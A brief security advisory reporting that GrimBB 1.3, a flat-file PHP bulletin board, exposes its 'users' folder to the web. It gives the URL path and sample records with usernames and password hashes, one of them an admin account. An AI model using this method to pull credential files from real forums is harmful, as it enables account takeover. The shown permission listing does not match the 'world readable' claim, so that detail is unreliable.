Grimbb V1.3 User and Password Hash Disclosure
==============================================


Discovered by N_A, N_A[at]tutanota.com
=======================================




Description
============

A PHP 4 Open Source Flat File Based Bulletin Board System -> GrimBB uses text files to store the data for posts (doesn't need outside database like MySQL). Its easy to configure (only two distribution files require changes to achieve immediate results).


https://sourceforge.net/projects/grimbb





Vulnerability
==============


After a *default* installation of Grim Bulletin Board v 1.3 permissions for the 'users' folder is world readable resulting in full disclosure of 
stored usernames and password hashes

root@kali:/var/www/html/grimbb# ls -al
.........
.........

drwx------A  2 www-data www-dataA  4096 NovA  5 18:13 users

root@kali:/var/www/html/grimbb# 




Exploitation
=============

Go to the following URL:

http://127.0.0.1/grimbb/users


Files containing usernames and hashes are readble, examples below:




type = 3
name = "jimmy"
pass = "15dfb4e0bc6ec941b33bbf26f532116b"
logdate = "201611"
register = "201611051813390"
userip = *********


type = 0
name = "admin"
pass = "d7e20b780957b7ba1b3b82fd76cf1485"
logdate = "201611"
register = "201611051634460"
userip = **********


type = 3
name = "pentest"
pass = "185eb48dec37cdedb5713c104841941d"
logdate = "201611"
register = "201611051813140"
userip = **********




Email
======

N_A[at]tutanota.com
--
Securely sent with Tutanota. Claim your encrypted mailbox today!
https://tutanota.com